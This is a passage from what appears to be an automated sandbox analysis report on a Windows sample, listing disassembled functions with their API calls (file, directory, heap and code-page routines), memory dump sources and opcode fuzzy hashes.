    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: ec572fab175ec5a7cff789d2fc809b851f4919c7881effbbb04bbcf13d9571e0
    • Instruction ID: de4d70db1aac3cb2cd46fe7fd69f45d5a1e006c624a9cbf4742ccc2de08d9431
    • Opcode Fuzzy Hash: ec572fab175ec5a7cff789d2fc809b851f4919c7881effbbb04bbcf13d9571e0
    • Instruction Fuzzy Hash: 020149B134434A6FE3246F64DC81FB6B398EB40726F20023EF7866A4C1CEA4A840D620
    Function 000BB20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
    Download Yara Rule
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,000BE79B,00000001,?,?,?,00000000,000C66B2,?,?,?), ref: 000BB22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000C66B2,?,?,?,?,?,000C6174,?), ref: 000BB275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,000BE79B,00000001,?,?), ref: 000BB2A1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: 817210a737ce63c0839bd9b3649ed042dc79732d6c4fff6d0a7718e93c46acb3
    • Instruction ID: 5da54f292f978ae9372b7bf83ffa450341386701034d11cd5afbf67745778389
    • Opcode Fuzzy Hash: 817210a737ce63c0839bd9b3649ed042dc79732d6c4fff6d0a7718e93c46acb3
    • Instruction Fuzzy Hash: AF31D231248345AFEB14CF10D858BEE77E5FB90B15F04461DFA916B290CBB4AD48CBA2
    Function 000BB542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000BD68B: _wcslen.LIBCMT ref: 000BD691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB59C
    • GetLastError.KERNEL32(?,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB5B9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: 4680775df1d933126a2da7be6710bee6bca596b6b7415130beef38b2b79bca46
    • Instruction ID: 563a8774125e4bc5143846a901f138542d260ce61be0e9303490f8cce08c48f3
    • Opcode Fuzzy Hash: 4680775df1d933126a2da7be6710bee6bca596b6b7415130beef38b2b79bca46
    • Instruction Fuzzy Hash: 3B01D8312046646BEF716F719C45FFE33889F05780F040425F901E6182DBA4DA4187A6
    Function 000DCA43 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
    Download Yara Rule
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 000DCA68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: e5234eac87de6aaafd4cee754d10bd09214358b1e0e1261a73d728c0df94445f
    • Instruction ID: 520d7b81022c5f35ea6883b91e90ce3186ef5fe36db6cc31c26aeb8eed2732b0
    • Opcode Fuzzy Hash: e5234eac87de6aaafd4cee754d10bd09214358b1e0e1261a73d728c0df94445f
    • Instruction Fuzzy Hash: 0441077050434D9EEB218A688C85EFABBEADB05318F1404EFE58A86242D235AE45CF70
    Function 000DBE48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 000DBEA8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: S
    • API String ID: 190572456-186050230
    • Opcode ID: df557e00ac5de4b520f3cdec850e8b4202721814c5e5d8ee78e688f3fd7a9c07
    • Instruction ID: 0e234f002a72c202e7e56d07918c8e0b9f5f2948c9aaa02d83d6467cbe9f4d60
    • Opcode Fuzzy Hash: df557e00ac5de4b520f3cdec850e8b4202721814c5e5d8ee78e688f3fd7a9c07
    • Instruction Fuzzy Hash: 2011E733A00324DF9B619E29EC404EE73E59B847607174222FE14AB355DB34EC41DAE0
    Function 000DC11C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 000DC18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: c2c34bf9494e9c461746cca0126107488e9ab0898e386835d911e6268df6c2e4
    • Instruction ID: 83250b1913f01cfeb54b7216b8794f131e9fd01c3b2f45d45d5f93fbce52c404
    • Opcode Fuzzy Hash: c2c34bf9494e9c461746cca0126107488e9ab0898e386835d911e6268df6c2e4
    • Instruction Fuzzy Hash: 41012532500259BBEF12AF91DC01DEE7FA2EF08710F454116FF082A261CB368971EB91
    Function 000DC0BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,000DB71F), ref: 000DC105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 1e542e70afc11386c7dd9bc6bcb78817a8dadd33c64403545cd30e7c2c9abfac
    • Instruction ID: 2773a84ab019440e8f979c8a75b24f5e955f28fd7a4309875b80cc555a8c56ef
    • Opcode Fuzzy Hash: 1e542e70afc11386c7dd9bc6bcb78817a8dadd33c64403545cd30e7c2c9abfac
    • Instruction Fuzzy Hash: DCF0B431A41218BBEF21AF51CC05DAD7FA1DF18B50F404067FE093A261CE315950EB91
    Function 000DBF5F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: de95536d7269c7a08d5bfcc7bc07957f186ea2abf53fcc2deaca0b17e58b06ba
    • Instruction ID: 15cec53a3e191995de1e0e8c026c88b8cf38f219d088422c8a16cf9836540895
    • Opcode Fuzzy Hash: de95536d7269c7a08d5bfcc7bc07957f186ea2abf53fcc2deaca0b17e58b06ba
    • Instruction Fuzzy Hash: BBE0EC31F40318AFD6116B519C0697EBB95CF04B10F460157F9097B391CF755D019ADA
    Function 000DCDA0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000DC96B: GetOEMCP.KERNEL32(00000000,?,?,000DCBF4,?), ref: 000DC996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,000DCC39,?,00000000), ref: 000DCE14
    • GetCPInfo.KERNEL32(00000000,000DCC39,?,?,?,000DCC39,?,00000000), ref: 000DCE27
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: 8a2ecd3aea2490a990bd45950b4c61931c02a380e5637d00919b8cc7125506d4
    • Instruction ID: 97bab59eae80795ccd3a0ad95f0d046b9163c654d45d4b0cf671d33b21453db3
    • Opcode Fuzzy Hash: 8a2ecd3aea2490a990bd45950b4c61931c02a380e5637d00919b8cc7125506d4
    • Instruction Fuzzy Hash: C451F0B19043079EFB218F75C885EFABBE6AF41300F14406FD0968A752E6399942DBA0
    Function 000BACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,000BACB0,?,?,00000000,?,?,000B9C8B,?), ref: 000BAE3A
    • GetLastError.KERNEL32(?,?,000B9C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 000BAE49
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 9ae8f6f8fc0e769d8941d9ddf4f3db031ac0a29f7e6a3047e2a48e0db885e131
    • Instruction ID: dc5ea3ba2a5547da954f9ec2553b3093c766172491100115bafa55060faf962b
    • Opcode Fuzzy Hash: 9ae8f6f8fc0e769d8941d9ddf4f3db031ac0a29f7e6a3047e2a48e0db885e131
    • Instruction Fuzzy Hash: 254101347043458BDB34AF24C888AEE73E5FB5A322F10062EE89787A51D775DC858B53
    Function 000CA59B Relevance: 3.1, APIs: 2, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,000CA7F6,00000000,?), ref: 000CA699
    • SetWindowTextW.USER32(00000000,00000000), ref: 000CA6A3
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: dc4491d2ac72366d24330c74384f3919a0bc5d14ae3d3127441e147668284da2
    • Instruction ID: ecc0fe5346886d7485a088903c9d3e9e8f4f02243ec471a47a328d3fefcb0cc7
    • Opcode Fuzzy Hash: dc4491d2ac72366d24330c74384f3919a0bc5d14ae3d3127441e147668284da2
    • Instruction Fuzzy Hash: 45314B3170071AAFD714DF64EC88E1EBBE9BF49704B09051EF6459B260DB71AC41CBA6
    Function 000DCBD7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000DA505: GetLastError.KERNEL32(?,000F30C4,000D5972,000F30C4,?,?,000D53ED,?,?,000F30C4), ref: 000DA509
      • Part of subcall function 000DA505: _free.LIBCMT ref: 000DA53C
      • Part of subcall function 000DA505: SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA57D
      • Part of subcall function 000DA505: _abort.LIBCMT ref: 000DA583
      • Part of subcall function 000DCCFE: _abort.LIBCMT ref: 000DCD30
      • Part of subcall function 000DCCFE: _free.LIBCMT ref: 000DCD64
      • Part of subcall function 000DC96B: GetOEMCP.KERNEL32(00000000,?,?,000DCBF4,?), ref: 000DC996
    • _free.LIBCMT ref: 000DCC4F
    • _free.LIBCMT ref: 000DCC85
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 7a180ac5d152a4966fc5d9eed213d61f40e2dbd97f9e08bb06836c2757b6849b
    • Instruction ID: c73a0e8c76c84a5b5b8b8ca8875558e7ac424faaa93df24c1c9a07853cca1f0a
    • Opcode Fuzzy Hash: 7a180ac5d152a4966fc5d9eed213d61f40e2dbd97f9e08bb06836c2757b6849b
    • Instruction Fuzzy Hash: 5631B33191430AAFEB14DB68D840EA9B7E5AF41320F25409BE5089B392EB369D40DB60
    Function 000BB032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
    Download Yara Rule
    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000B7ED0,?,?,?,00000000), ref: 000BB04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 000BB100
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 1a4ce533ec2cc1717335771268fb66d94e7f1bfa37c8f74b6483b77354ec1ef9
    • Instruction ID: 7c392a3f6631ed22f785a989f51e0a04132fe59fe667877717d4c795abdb6279
    • Opcode Fuzzy Hash: 1a4ce533ec2cc1717335771268fb66d94e7f1bfa37c8f74b6483b77354ec1ef9
    • Instruction Fuzzy Hash: C121F031269241DBC724EF64C891AFBBBE4AF91304F04491CB4E183141D7A9E90C9B62
    Function 000BA8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000BB1B7,?,?,000B81FD), ref: 000BA946
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000BB1B7,?,?,000B81FD), ref: 000BA976
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 1a0330b377e1dc9f20d40dd131323e844f1508d0aab4ceffc2e008adfaa65e04
    • Instruction ID: 8f16f03ade6bb0a4fc7834cd15ee7230cff46e5edbbabb0340ff43529c313063
    • Opcode Fuzzy Hash: 1a0330b377e1dc9f20d40dd131323e844f1508d0aab4ceffc2e008adfaa65e04
    • Instruction Fuzzy Hash: C921D071604344AEE3708A25CC88FF776DCEB4A321F010A2DF9D5C21D2C778A8859672
    Function 000BB110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
    Download Yara Rule
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 000BB157
    • GetLastError.KERNEL32 ref: 000BB164
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 89d8c33f4eee953684bcc3f3fbe27dc6d980a451235368cee7cc5ab91b294767
    • Instruction ID: c4d5b7464274cba79b33d229587384f588c3d9e95f4eed50494642f487886e1d
    • Opcode Fuzzy Hash: 89d8c33f4eee953684bcc3f3fbe27dc6d980a451235368cee7cc5ab91b294767
    • Instruction Fuzzy Hash: 3A11E131600700ABE735CA2CCC64BEAB3E9BB44370FA04B29E192935D0EBB4ED05C760
    Function 000DA694 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 000DA6B5
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000F30C4,000B187A,?,?,00000007,?,?,?,000B13F2,?,00000000), ref: 000DA6F1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 7abb679aed427eb418e10d604bab4bbb8807188ca3ecef5764fb9279e3b28c98
    • Instruction ID: 91893600306f83bc5061c2c20a12c34064911405b78c7a1a7428943cae472b8f
    • Opcode Fuzzy Hash: 7abb679aed427eb418e10d604bab4bbb8807188ca3ecef5764fb9279e3b28c98
    • Instruction Fuzzy Hash: DEF06232301315E6DB613A26AC45AAB3B989F83BB1B1D4027F855AA3A2DB30DC009577
    Function 000C23B6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 000C23C3
